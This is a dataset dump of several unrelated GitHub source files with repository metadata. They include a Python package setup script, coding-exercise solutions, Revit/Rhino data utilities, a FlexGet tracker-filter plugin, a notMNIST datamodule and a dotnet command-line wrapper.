app.run(debug=True)\n\n","repo_name":"cidambic/divPortolio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37424445749","text":"from setuptools import setup, 
find_packages\n\n\ndef get_version(package_path):\n    import os\n    from importlib.util import module_from_spec, spec_from_file_location\n\n    spec = spec_from_file_location(\"version\", os.path.join(package_path, \"_version.py\"))\n    module = module_from_spec(spec)\n    spec.loader.exec_module(module)\n    version = module.get_version_from_static()\n    return version\n\n\nversion = get_version(\"ersilia\")\n\n\nwith open(\"README.md\", \"r\", encoding=\"utf8\") as fh:\n    long_description = fh.read()\n\n# Slim requirements\nslim = [\n    \"inputimeout\",\n    \"emoji\",\n    \"validators\",\n    \"h5py\",\n    \"loguru\",\n    \"pyairtable<2\",\n    \"PyYAML\",\n    \"dockerfile-parse\",\n    \"tqdm\",\n    \"click\",\n    \"docker\",\n]\nslim_requires = slim\n\n# Lake requirements\nlake_requires = slim_requires + [\"isaura==0.1\"]\n\n# Doc builder requirements\ndoc_builder_requires = slim + [\"sphinx\", \"jinja2\"]\n\n# Test requirements\ntest_requires = slim + [\"pytest\", \"fuzzywuzzy\"]\n\n# Define extras requires\nextras_require = {\n    \"lake\": lake_requires,\n    \"docs\": doc_builder_requires,\n    \"test\": test_requires,\n}\n\nsetup(\n    name=\"ersilia\",\n    version=version,\n    author=\"Ersilia Open Source Initiative\",\n    author_email=\"hello@ersilia.io\",\n    url=\"https://github.com/ersilia-os/ersilia\",\n    description=\"A hub of AI/ML models for open source drug discovery and global health\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    license=\"GPLv3\",\n    python_requires=\">=3.7\",\n    install_requires=slim_requires,\n    extras_require=extras_require,\n    packages=find_packages(),\n    entry_points={\"console_scripts\": [\"ersilia=ersilia.cli:cli\"]},\n    classifiers=[\n        \"Programming Language :: Python :: 3.7\",\n        \"Programming Language :: Python :: 3.8\",\n        \"Programming Language :: Python :: 3.9\",\n        \"Programming Language :: Python :: 3.10\",\n        \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n        \"Operating System :: OS Independent\",\n        \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n    ],\n    keywords=\"drug-discovery machine-learning ersilia open-science global-health model-hub infectious-diseases\",\n    project_urls={\n        \"Landing page\": \"https://ersilia.io\",\n        \"Models\": \"https://ersilia.io/model-hub\",\n        \"Source Code\": \"https://github.com/ersilia-os/ersilia/\",\n    },\n    package_data={\"ersilia\": [\"hub/content/metadata/*.txt\"]},\n    include_package_data=True,\n)\n\n\n# Install bentoml if necessary\ndef check_bentoml(package_path):\n    import os\n    from importlib.util import module_from_spec, spec_from_file_location\n\n    spec = spec_from_file_location(\n        \"bentoml_requirement\",\n        os.path.join(package_path, \"setup\", \"requirements\", \"bentoml.py\"),\n    )\n    module = module_from_spec(spec)\n    spec.loader.exec_module(module)\n    req = module.BentoMLRequirement()\n    if not req.is_bentoml_ersilia_version():\n        req.install()\n    return version\n\n\ncheck_bentoml(\"ersilia\")\n","repo_name":"ersilia-os/ersilia","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"37"} +{"seq_id":"42089293012","text":"import math\n\n# number of exam rooms\nn = int(input())\n# number of examinees in each exam room\ncandidate = list(map(int, input().split()))\n# b = chief supervisor's capacity, c = assistant supervisor's capacity\nb, c = map(int, input().split())\n\n# minimum number of supervisors required\nresult = 0\nfor cand in candidate:\n    # if the chief supervisor alone can cover this room\n    if cand <= b:\n        result += 1\n    # if assistant supervisors are needed as well\n    else:\n        result += math.ceil((cand-b) / c) + 
1\n\nprint(result)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/코테재활/삼성 역테 재활/solution73.py","file_name":"solution73.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"43055153658","text":"\"\"\"\npyVersion = IronPython 2.7xx and Python 3.7xx\n\nThese classes are compatible with both Rhino and Revit\nand are meant to assist in exchanging data between\nthese platforms, or between any program and the OS.\n\nEach data tool is an object with accessible\nmethods therein which can be linked together. There is\nno main function and nothing will run without being\nexplicitly instantiated\n\nBecause this is meant to be used in both Python3 and\nironPython precautions must be taken in the code!\n\"\"\"\n# UNIVERSAL MODULES\nimport traceback\nimport sys\n\ntry:\n sys.path.append(r\"C:\\Program Files (x86)\\IronPython 2.7\\Lib\")\nexcept:\n sys.path.append(r\"C:\\Program Files\\IronPython 2.7\\Lib\")\nimport json \n\n#import collections\n#from collections import Sequence\nfrom itertools import chain, count\n\nimport csv\nimport os\n\n# .NET MODULES\nif \"2.\" and \"IronPython\" in sys.version:\n import clr\n \n #clr.AddReference('msgpack.dll')\n #import msgpack\n \n # imports for Revit API\n clr.AddReference('RevitAPI')\n clr.AddReference('RevitAPIUI')\n from Autodesk.Revit.DB import *\n from Autodesk.Revit.UI import * \n\n# PYTHON 3 MODULES\nelif \"3.\" in sys.version:\n sys.path.append(r\"C:\\Users\\aluna\\AppData\\Local\\Programs\\Python\\Python37\\Lib\")\n import ujson\n import msgpack\n\nclass FilePathTools:\n def __init__(self):\n self.targetDirectory = None\n\n def CurrentFilePath(self):\n return(os.path.abspath(__file__))\n\n def CurrentFileDirectory(self):\n return(os.path.dirname(self.CurrentFilePath()))\n\n def CurrentUserDesktopPath(self):\n return(os.path.expanduser(\"~\\Desktop\"))\n \n def CurrentUser(self):\n return(os.path.expanduser(\"~\"))\n\n def ShiftFilePath(self, path, branchesBack=1, append=None):\n pathReverse = path[::-1]\n newPathReverse = pathReverse.split('\\\\', branchesBack)[-1]\n newPath = newPathReverse[::-1]\n \n # always write append string as r\"\" - set as variable\n if type(append) is str: return(r\"{0}\\{1}\".format(newPath, append))\n\n# data prep for JSON AND CSV modules\nclass DataPrep:\n def __init__(self):\n pass\n\n def GroupNthItemList(self, data, groupSize):\n dataOut = []\n for building in data:\n count = 0\n for facadeIndex in range(len(building)):\n anotherNest = []\n facadesTempList = []\n\n # group facades in sub lists by looping through groupSize\n for groupIndex in range(groupSize):\n masterIndex = (facadeIndex + groupIndex + count)\n if masterIndex <= (len(building) - 1):\n facadesTempList.append(building[masterIndex])\n if len(facadesTempList) > 0:\n count += (groupSize - 1)\n\n # still dont understand why this i needed...group the groups?\n anotherNest.append(facadesTempList)\n dataOut.append(anotherNest)\n return(dataOut)\n\nclass JSONTools:\n \"\"\"\n This class works for both Python2,3 and IronPython\n\n fileName and filePath are separated to simply the assignment\n of creating files in specific, but common locations by allowing\n keywords that the code recognizes to create a long path string.\n This to prevent the manual copying and pasting process.\n \"\"\"\n def __init__(self):\n # instantiate FilePathTools Class\n self.pathObj = FilePathTools()\n \n def WriteJSON(self, data, filePath=None, fileName=None):\n 
# file path operations or something\n if not fileName: fileName = \"randoJSON\" \n if filePath == None: filePath = self.pathObj.CurrentUserDesktopPath()\n elif filePath == 'current': filePath = self.pathObj.CurrentFileDirectory()\n elif filePath == 'Lib': self.filePath = None\n completeFilePath = r\"{0}\\{1}.json\".format(filePath, fileName)\n \n # write json\n with open(completeFilePath, 'w') as writePath:\n JSONdump = json.dump(data, writePath)\n \n return(JSONdump)\n \n def Write_MSGPACK(self, data, filePath=None, fileName=None):\n if fileName == None: fileName = \"randoMSGPACK\"\n \n if filePath == None: filePath = self.pathObj.CurrentUserDesktopPath()\n elif filePath == 'current': filePath = self.pathObj.CurrentFileDirectory()\n elif filePath == 'Lib': self.filePath = None\n \n completeFilePath = r\"{0}\\{1}.msgpack\".format(filePath, fileName)\n \n # Write msgpack file\n with open(completeFilePath, 'w') as writePath:\n msgpack.pack(data, writePath) \n\n def ReadJSON(self, filePath=None):\n if filePath == None: raise Exception(\"Complete path must be used!\")\n\n with open(filePath, 'r') as read:\n dataOut = json.load(read)\n return(dataOut)\n \n def Read_UJSON(self, filePath=None):\n if filePath == None: raise Exception(\"Complete path must be used!\")\n \n with open(filePath, 'r') as read:\n dataOut = ujson.load(read)\n return(dataOut)\n \n def Read_MSGPACK(self, filePath=None):\n if filePath == None: raise Exception(\"Complete path must be used!\")\n \n with open(filePath, 'r') as read:\n dataOut = msgpack.unpack(read)\n return(dataOut)\n \n \nclass CSVTools:\n \"\"\"\n data assumes data is single column, if more than one column then you can make iterable\n \"\"\"\n def __init__(self, fileName=None, filePath=None):\n # instantiate FilePathTools Class\n self.pathObj = FilePathTools() \n\n self.fileName = fileName\n self.filePath = filePath\n\n # default file write locations and keyword options\n if self.fileName == None: self.fileName = \"randoCSV\"\n\n if self.filePath == None: self.filePath = FilePathTools().CurrentUserDesktopPath()\n elif self.filePath == 'current': self.filePath == FilePathTools().CurrentFileDirectory()\n elif self.filePath == 'Lib': self.filePath = None \n\n def ReadCSV(self, row=True, cellStart=None, cellEnd=None):\n # cellStart = (row#, column#)\n\n # assume fileName contiains full path, unless files are saved in same location\n with open(self.fileName, mode='r') as csvFile:\n # read rows\n if row == True:\n csvReader = csv.reader(csvFile, delimiter=',')\n csvData = [i for i in csvReader]\n\n # read columns\n elif row == False:\n csvReader = csv.reader(csvFile, delimiter=',')\n csvData = [i for i in zip(*csvReader)]\n\n return(csvData)\n\n def WriteCSV(self, data, row=True, cellStart=None, cellEnd=None):\n # cellStart = (row#, column#)\n\n completeFilePath = \"{0}/{1}.csv\".format(self.filePath, self.fileName)\n\n with open(completeFilePath, mode='w') as csvFile:\n writerObj = csv.writer(csvFile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n # write row\n if row == True:\n for i in data:\n writerObj.writerow(i)\n\n # write column\n elif row == False:\n data2 = zip(data)\n for i in data2:\n writerObj.writerow([i])\n return(None)\n\n def WriteCSV2(self, data, cellStart=None, cellEnd=None):\n # cellStart = (row#, column#)\n print('hello world')\n inPath = \"{0}/{1}.csv\".format(self.filePath, 'in')\n outPath = \"{0}/{1}.csv\".format(self.filePath, 'out')\n\n in_file = open(inPath, mode='r')\n reader = csv.reader(in_file)\n\n myList = list(reader)\n 
in_file.close()\n\n print(myList)\n\n #myList[2][0] = 'cat'\n #myNewList = open(outPath, mode='w', newline='')\n #writer = csv.writer(myNewList)\n #writer.writerows(myList)\n #myNewList.close() \n\nclass SQLTools:\n \"\"\"\n This class only works in Python 2 & 3. Not implemented for IronPython.\n Please call subprocess to use within Rhino or Revit. \n \"\"\"\n def __init__(self):\n import sqlite3\n pass\n\n def WriteDB(self):\n pass\n\n def UpdateDB(self):\n pass \n\n def ReadDB(self):\n pass\n\n\nclass GRASSHOPPERTools:\n def __init__(self):\n pass\n\n def DEPRECATED(self, raggedList):\n # Grasshopper imports\n import clr\n clr.AddReference(\"Grasshopper\")\n from Grasshopper import DataTree\n from Grasshopper.Kernel.Data import GH_Path\n\n from System import Array\n from System import Object\n\n\n rl = raggedList\n result = DataTree[object]()\n for i in range(len(rl)):\n temp = []\n for j in range(len(rl[i])):\n temp.append(rl[i][j])\n #print i, \" - \",temp\n path = GH_Path(i)\n result.AddRange(temp, path)\n return(result)\n\n def NestedListToDataTree(self, input, none_and_holes=True, source=[0]):\n # Grasshopper imports\n import clr\n clr.AddReference(\"Grasshopper\")\n from Grasshopper import DataTree\n from Grasshopper.Kernel.Data import GH_Path\n\n from System import Array\n from System import Object\n\n def proc(input,tree,track):\n path = GH_Path(Array[int](track))\n if len(input) == 0 and none_and_holes: tree.EnsurePath(path); return\n for i,item in enumerate(input):\n if hasattr(item, '__iter__'): # if list or tuple\n track.append(i); proc(item,tree,track); track.pop()\n else:\n if none_and_holes: tree.Insert(item,path,i)\n elif item is not None: tree.Add(item,path)\n if input is not None: t=DataTree[object]();proc(input,t,source[:]);return t\n\n def DataTreeToNestedList(self, aTree):\n # Grasshopper imports\n import clr\n clr.AddReference(\"Grasshopper\")\n from Grasshopper import DataTree\n from Grasshopper.Kernel.Data import GH_Path\n\n from System import Array\n from System import Object\n\n\n theList = []\n for i in range(aTree.BranchCount ):\n thisListPart = []\n thisBranch = aTree.Branch(i)\n for j in range(len(thisBranch)):\n thisListPart.append( thisBranch[j] )\n theList.append(thisListPart)\n return(theList)\n\nclass ListTools:\n def __init__(self):\n pass\n\n #def ListDepth(self, dataList):\n #dataList = iter(dataList)\n #try:\n #for level in count():\n #dataList = chain([next(dataList)], dataList)\n #dataList = chain.from_iterable(s for s in dataList if isinstance(s, Sequence))\n\n ## do not recognize the formatting after except\n #except StopIteration:\n #return(level)\n ## yield from is not ironpython safe???\n #def MissingNumbersInSequence(numList, start, end):\n ## very advanced formatting, is this recursion?\n #if end - start <= 1: \n #if numList[end] - numList[start] > 1:\n #yield from range(numList[start] + 1, numList[end])\n #return\n\n #index = start + (end - start) // 2\n\n ## is the lower half consecutive?\n #consecutive_low = numList[index] == numList[start] + (index - start)\n #if not consecutive_low:\n #yield from MissingNumbersInSequence(numList, start, index)\n\n ## is the upper part consecutive?\n #consecutive_high = numList[index] == numList[end] - (end - index)\n #if not consecutive_high:\n #yield from MissingNumbersInSequence(numList, index, end)\n\n return(False)\n\nclass RangeDict(dict):\n def __getitem__(self, item):\n if type(item) != range: # or xrange in Python 2\n for key in self:\n if item in key:\n return(self[key])\n else:\n 
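# the key is itself a range object, so fall back to the plain dict lookup\n 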
return(super().__getitem__(item))\n\ndef frange(start, stop=None, step=None):\n # use float number in range() function\n \n # if stop and step argument is null set start=0.0 and step=1.0\n if stop == None:\n stop = start + 0.0\n start = 0.0\n \n if step == None:\n step = 1.0\n \n while True:\n if step > 0 and start >= stop:\n break\n elif step < 0 and start <= stop:\n break\n yield(\"{0}\".format(start))\n start = start + step\n\ndef frange2(x, y, jump):\n while x < y:\n yield x\n x += jump \n\ndef TestMain():\n ### csv write\n ###data = ['cat', 'dog', 'rabbit', 'dolphin', 7]\n ###csvWriteData = CSVTools().WriteCSV(data, False)\n ###print(csvWriteData)\n\n ###csvWriteData2 = CSVTools().WriteCSV2(data)\n ###print(csvWriteData2) \n\n ###csvFilePath = r\"C:\\Users\\aluna\\Downloads\\Memorial Weekend - Sheet1.csv\"\n ###csvReadData = CSVTools(csvFilePath).ReadCSV(False)\n ###print(csvReadData)\n \n #aDict = {frange2(1.0,3.0,.1): \"dog\",\n #frange2(3.0,float(sys.maxsize), .1) : \"CAT\"\n #}\n \n #rangObj = RangeDict(aDict)\n #print(rangObj[2.999])\n \n print(FilePathTools().CurrentUser())\n \n pass\n \n\nif __name__ == \"__main__\":\n TestMain()","repo_name":"tkahng/pyWest","sub_path":"pyWest.extension/pyWest.tab/lib/WW_DataExchange.py","file_name":"WW_DataExchange.py","file_ext":"py","file_size_in_byte":13283,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73327010346","text":"import cv2 as cv\n\ndef rescaleFrame(frame, scale = 0.5):\n\n width = int(frame.shape[1]*scale)\n height = int(frame.shape[0]*scale)\n\n dimensions = (width, height)\n\n return cv.resize(frame, dimensions, interpolation=cv.INTER_AREA)\n\n#img = cv.imread('photos/Screen Shot 2022-01-28 at 6.26.47 PM.png')\n#cv.imshow('Photo', img)\n\n#picture = rescaleFrame(img)\n\n#cv.imshow('Resized', picture)\n\n#cv.waitKey(0)\n\ncapture = cv.VideoCapture('https://media.tenor.co/videos/5bc3c822e7d615de68163bc14ad0d0b4/mp4')\nwhile True:\n #ret, frame = capture.read()\n ret, frame = capture.read() \n\n frame_resize = rescaleFrame(frame)\n if ret:\n cv.imshow(\"Image\", frame)\n else:\n print('no video')\n capture.set(cv.CAP_PROP_POS_FRAMES, 0)\n\n if cv.waitKey(1) & 0xFF==ord('d'):\n break\n\ncapture.release()\ncv.destroyAllWindows()\n\n\n\n","repo_name":"nandh24/opencv-i-think","sub_path":"opencv-i-think/rescale.py","file_name":"rescale.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11900703391","text":"# https://leetcode.com/problems/product-of-array-except-self/\n\nclass Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n \n result = [0]*len(nums)\n result[0] = 1\n \n for i in range(1, len(nums)):\n result[i] = nums[i-1]*result[i-1]\n \n revRes = 1\n for i in reversed(range(len(nums))):\n result[i] = result[i]*revRes\n revRes *= nums[i]\n \n return result","repo_name":"NichHarris/leet-code","sub_path":"productExceptSelf.py","file_name":"productExceptSelf.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32605332111","text":"from django.conf.urls import url\nfrom LeongGoodApp import views as v\nurlpatterns =[\n url(r'detail/(\\d+)/',v.detail,name='detail'),\n url(r'test/',v.test1),\n url(r'list/(?P\\d+)/(?P\\d+)',v.list,name='fruite'),\n url(r'index',v.index,name='index'),\n 
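# values captured by the URL regex groups are passed on to the view as extra arguments\n 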
url(r'hehehe/(\\d+)',v.heheda,name='hehehe'),\n url(r'order/',v.user_order,name='user_order'),\n url(r'cart',v.cart,name='cart'),\n url(r'place_order',v.place_order,name='place_order')\n\n\n]","repo_name":"cgsonglixin/lenong","sub_path":"lenong/LeongGoodApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"15249699589","text":"from __future__ import unicode_literals, division, absolute_import\r\n\r\nimport concurrent.futures\r\n\r\nfrom flexget import plugin\r\nfrom flexget.config_schema import one_or_more\r\nfrom flexget.event import event\r\nfrom flexget.utils.soup import get_soup\r\n\r\n\r\nclass NexusPHP(object):\r\n \"\"\"\r\n task_name:\r\n rss:\r\n url: https://www.example.com/rss.xml\r\n other_fields:\r\n - link\r\n nexusphp:\r\n cookie: 'my_cookie'\r\n discount:\r\n - free\r\n - 2x\r\n seeders:\r\n min: 1\r\n max: 30\r\n leechers:\r\n min: 1\r\n max: 100\r\n max_complete: 0.8\r\n \"\"\"\r\n\r\n schema = {\r\n 'type': 'object',\r\n 'properties': {\r\n 'cookie': {'type': 'string'},\r\n 'discount': one_or_more({'type': 'string', 'enum': ['free', '2x', '2xfree', '30%', '50%', '2x50%']}),\r\n 'seeders': {\r\n 'type': 'object',\r\n 'properties': {\r\n 'min': {'type': 'integer', 'minimum': 0},\r\n 'max': {'type': 'integer', 'minimum': 0}\r\n }\r\n },\r\n 'leechers': {\r\n 'type': 'object',\r\n 'properties': {\r\n 'min': {'type': 'integer', 'minimum': 0},\r\n 'max': {'type': 'integer', 'minimum': 0},\r\n 'max_complete': {'type': 'number', 'minimum': 0, 'maximum': 1}\r\n }\r\n }\r\n },\r\n 'required': ['cookie']\r\n }\r\n\r\n def build_config(self, config):\r\n config = dict(config)\r\n config.setdefault('discount', None)\r\n config.setdefault('seeders', {'min': 0, 'max': 100000})\r\n config['seeders'].setdefault('min', 0)\r\n config['seeders'].setdefault('max', 100000)\r\n config.setdefault('leechers', {'min': 0, 'max': 100000, 'max_complete': 1})\r\n config['leechers'].setdefault('min', 0)\r\n config['leechers'].setdefault('max', 100000)\r\n config['leechers'].setdefault('max_complete', 1)\r\n return config\r\n\r\n @plugin.priority(-1)\r\n def on_task_filter(self, task, config):\r\n config = self.build_config(config)\r\n\r\n def consider_entry(_entry, _link):\r\n discount, seeders, leechers = NexusPHP._get_info(task, _link, config['cookie'])\r\n seeder_max = config['seeders']['max']\r\n seeder_min = config['seeders']['min']\r\n leecher_max = config['leechers']['max']\r\n leecher_min = config['leechers']['min']\r\n\r\n if config['discount']:\r\n if discount not in config['discount']:\r\n _entry.reject('%s does not match discount' % discount) # discount type does not match\r\n return\r\n\r\n if len(seeders) not in range(seeder_min, seeder_max + 1):\r\n _entry.reject('%d is out of range of seeder' % len(seeders)) # seeder count out of range\r\n return\r\n\r\n if len(leechers) not in range(leecher_min, leecher_max + 1):\r\n _entry.reject('%d is out of range of leecher' % len(leechers)) # leecher count out of range\r\n return\r\n\r\n max_complete = max(leechers, key=lambda x: x['completed'])['completed']\r\n if max_complete > config['leechers']['max_complete']:\r\n _entry.reject('%f is more than max_complete' % max_complete) # max completion ratio exceeded\r\n return\r\n\r\n _entry.accept()\r\n\r\n futures = [] # thread pool tasks\r\n with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\r\n for entry in task.entries:\r\n link = entry.get('link')\r\n if not link:\r\n raise plugin.PluginError(\"The rss plugin requires 'other_fields' which 
contain 'link'. \"\r\n \"For example: other_fields: - link\")\r\n futures.append(executor.submit(consider_entry, entry, link))\r\n\r\n concurrent.futures.as_completed(futures)\r\n\r\n @staticmethod\r\n # 解析页面,获取优惠、做种者信息、下载者信息\r\n def info_from_page(detail_page, peer_page):\r\n soup = get_soup(detail_page.content)\r\n try:\r\n discount_class = soup.find('h1', id='top').b.font['class'][0] # selector: '#top > b:nth-child(1) > font'\r\n discount_table = {\r\n 'free': 'free',\r\n 'twoup': '2x',\r\n 'twoupfree': '2xfree',\r\n 'thirtypercent': '30%',\r\n 'halfdown': '50%',\r\n 'twouphalfdown': '2x50%'\r\n }\r\n discount = discount_table[discount_class]\r\n except AttributeError:\r\n discount = None # 无优惠\r\n\r\n def get_peers(table):\r\n peers = []\r\n for index, tr in enumerate(table.find_all('tr')):\r\n if index != 0:\r\n try:\r\n tds = tr.find_all('td')\r\n peers.append({\r\n 'name': tds[0].get_text(),\r\n 'connectable': True if tds[1].get_text() != '是' else False,\r\n 'uploaded': tds[2].get_text(),\r\n 'downloaded': tds[4].get_text(),\r\n 'completed': float(tds[7].get_text().strip('%')) / 100\r\n # 'completed': tds[7].get_text()\r\n })\r\n except IndexError:\r\n pass\r\n except ValueError:\r\n pass\r\n return peers\r\n\r\n soup = get_soup(peer_page.content)\r\n tables = soup.find_all('table', limit=2)\r\n seeders = get_peers(tables[0])\r\n leechers = get_peers(tables[1])\r\n\r\n return discount, seeders, leechers\r\n\r\n @staticmethod\r\n def _get_info(task, link, cookie):\r\n detail_page = task.requests.get(link, headers={'cookie': cookie}) # 详情\r\n peer_url = link.replace('details.php', 'viewpeerlist.php', 1)\r\n peer_page = task.requests.get(peer_url, headers={'cookie': cookie}) # peer详情\r\n return NexusPHP.info_from_page(detail_page, peer_page)\r\n\r\n\r\n@event('plugin.register')\r\ndef register_plugin():\r\n plugin.register(NexusPHP, 'nexusphp', api_ver=2)\r\n","repo_name":"CrossStone/flexget-nexusphp","sub_path":"nexusphp.py","file_name":"nexusphp.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"5561476292","text":"import os\nfrom datamodules.abstractdm import AbstractDataModule\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport pytorch_lightning as pl\nimport matplotlib.pyplot as plt\n\n# code adapted from https://www.kaggle.com/code/eranartzi/notmnist-cnn-3-conv2d-3-pooling-2-fc\ndef convert_to_pandas(dir_, letters):\n # Retrieve pictures files names\n pictures_files = {}\n for letter in letters:\n images = [name for name in os.listdir(str(dir_) + '/' + letter) if name[-4:] == '.png']\n pictures_files[letter] = images\n\n # print(pictures_files)\n # Get the actual pictures\n data = {}\n for letter in letters:\n images = []\n for name in pictures_files[letter]:\n try:\n images.append(plt.imread(str(dir_)+'/{}/{}'.format(letter, name)))\n except Exception as e:\n print(e)\n print(str(dir_)+'/{}/{}'.format(letter, name))\n data[letter] = images\n break\n\n # Merge all data to one list\n X = []\n Y = []\n X_nd = np.zeros(shape=(18724, 784))\n Y_nd = np.zeros(shape=(18724))\n for key, list_ in data.items():\n for img in list_:\n X.append(img.reshape(-1))\n Y.append(key)\n X = np.array(X)\n Y = np.array([mapping[x] for x in Y])\n\n return pd.DataFrame(X, Y).reset_index()\n\nmapping = {\n 'A': 0,\n 'B': 1,\n 'C': 2,\n 'D': 3,\n 'E': 4,\n 'F': 5,\n 'G': 6,\n 'H': 7,\n 'I': 8,\n 'J': 9\n}\n\nclass NotMNISTDataset(Dataset):\n\n def __init__(self, 
path='/u/home/korth/notMNIST_small/', transform=None):\n letters = os.listdir(path)\n self.df = convert_to_pandas(path, letters)\n\n self.images = self.df.iloc[:, 1:].values.reshape((-1, 1, 28, 28))\n self.targets = self.df.iloc[:, 0].values\n\n self.transform = transform\n\n def __len__(self):\n return len(self.targets)\n\n def __getitem__(self, idx):\n x = self.images[idx].squeeze()\n if self.transform:\n x = self.transform(x)\n y = self.targets[idx]\n return x, y\n\n\nidx_to_class = {\n 0: 'A',\n 1: 'B',\n 2: 'C',\n 3: 'D',\n 4: 'E',\n 5: 'F',\n 6: 'G',\n 7: 'H',\n 8: 'I',\n 9: 'J'\n}\n\n\nclass NotMNISTDataModule(AbstractDataModule):\n\n def __init__(self, **kwargs):\n super().__init__()\n\n def _setup(self, positive_class=-1):\n self.test_dataset = NotMNISTDataset(\n transform=self.hparams.test_transform)\n\n def train_dataloader(self):\n raise Exception('NotMNIST only supports a test_dataloader()')\n\n def val_dataloader(self):\n raise Exception('NotMNIST only supports a test_dataloader()')\n\n def test_dataloader(self):\n return DataLoader(\n self.test_dataset,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.dataloader_num_workers,\n shuffle=False)\n\n def map_idx_to_class(self, number):\n return idx_to_class[number]\n","repo_name":"danielkorth/OOD-Detection-using-One-vs-All-Classifiers","sub_path":"datamodules/notmnist.py","file_name":"notmnist.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"35738133005","text":"\"\"\" Contains dotnet utilities \"\"\"\n\nimport devops_toolset.tools.cli\nfrom devops_toolset.core.app import App\nfrom devops_toolset.core.LiteralsCore import LiteralsCore\nfrom devops_toolset.project_types.dotnet.Literals import Literals as DotnetLiterals\nfrom devops_toolset.core.CommandsCore import CommandsCore\nfrom devops_toolset.project_types.dotnet.commands import Commands as DotnetCommands\n\napp: App = App()\nliterals = LiteralsCore([DotnetLiterals])\ncommands = CommandsCore([DotnetCommands])\n\n\ndef build(path: str, configuration: str = \"Release\", output: str = \".\", framework: str = \"net5.0\",\n runtime: str = \"linux-x64\", with_restore: bool = False, force: bool = False, debug: bool = False):\n \"\"\" Performs a dotnet build in the desired path\n Arguments:\n path: The path where build will be executed.\n configuration: The configuration used for build. Default is \"Release\".\n output: Adds --output argument. Specifies the output path of the build command. Defaults \".\"\n framework: The dotnet framework used to build. Default is \"net5.0\".\n runtime: The runtime used to build. Default is \"linux-x64\".\n with_restore: Adds --no-restore argument when False. 
Defaults to False.\n force: Adds --force argument.\n debug: Enables diagnostic logs to the command.\n\n More info: https://docs.microsoft.com/es-es/dotnet/core/tools/dotnet-build\n\n \"\"\"\n devops_toolset.tools.cli.call_subprocess(commands.get(\"dotnet_build\").format(\n force=convert_force_parameter(force),\n path=path,\n debug=convert_debug_parameter(debug),\n configuration=configuration,\n output=output,\n framework=framework,\n runtime=runtime,\n with_restore=convert_with_restore_parameter(with_restore)),\n log_before_process=[literals.get(\"dotnet_build_before\").format(path=path)],\n log_after_err=[literals.get(\"dotnet_build_err\").format(path=path)])\n\n\ndef convert_debug_parameter(value: bool) -> str:\n \"\"\" Converts the debug boolean into the corresponding parameter\n Arguments:\n value: The value to be converted\n\n Returns: --verbosity=diagnostic when true, empty value otherwise\n \"\"\"\n if value:\n return \"--verbosity=diagnostic\"\n return \"\"\n\n\ndef convert_force_parameter(value: bool) -> str:\n \"\"\" Converts the force boolean into the corresponding parameter\n Arguments:\n value: The value to be converted\n\n Returns: --force when true, empty value otherwise\n \"\"\"\n if value:\n return \"--force\"\n return \"\"\n\n\ndef convert_with_restore_parameter(value: bool) -> str:\n \"\"\" Converts the with_restore boolean into the corresponding parameter\n Arguments:\n value: The value to be converted\n\n Returns: --no-restore when false, empty value otherwise\n \"\"\"\n if not value:\n return \"--no-restore\"\n return \"\"\n\n\ndef restore(path: str, force: bool = False, debug: bool = False):\n \"\"\" Performs a dotnet restore in the desired path\n Arguments:\n path: The path where restore will be executed.\n force: Adds --force argument.\n debug: Enables diagnostic logs to the command.\n\n More info: https://docs.microsoft.com/es-es/dotnet/core/tools/dotnet-restore\n\n \"\"\"\n devops_toolset.tools.cli.call_subprocess(commands.get(\"dotnet_restore\").format(\n force=convert_force_parameter(force),\n path=path,\n debug=convert_debug_parameter(debug)),\n log_before_process=[literals.get(\"dotnet_restore_before\").format(path=path)],\n log_after_err=[literals.get(\"dotnet_restore_err\").format(path=path)])\n\n\nif __name__ == \"__main__\":\n help(__name__)\n","repo_name":"aheadlabs/devops-toolset","sub_path":"src/devops_toolset/project_types/dotnet/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
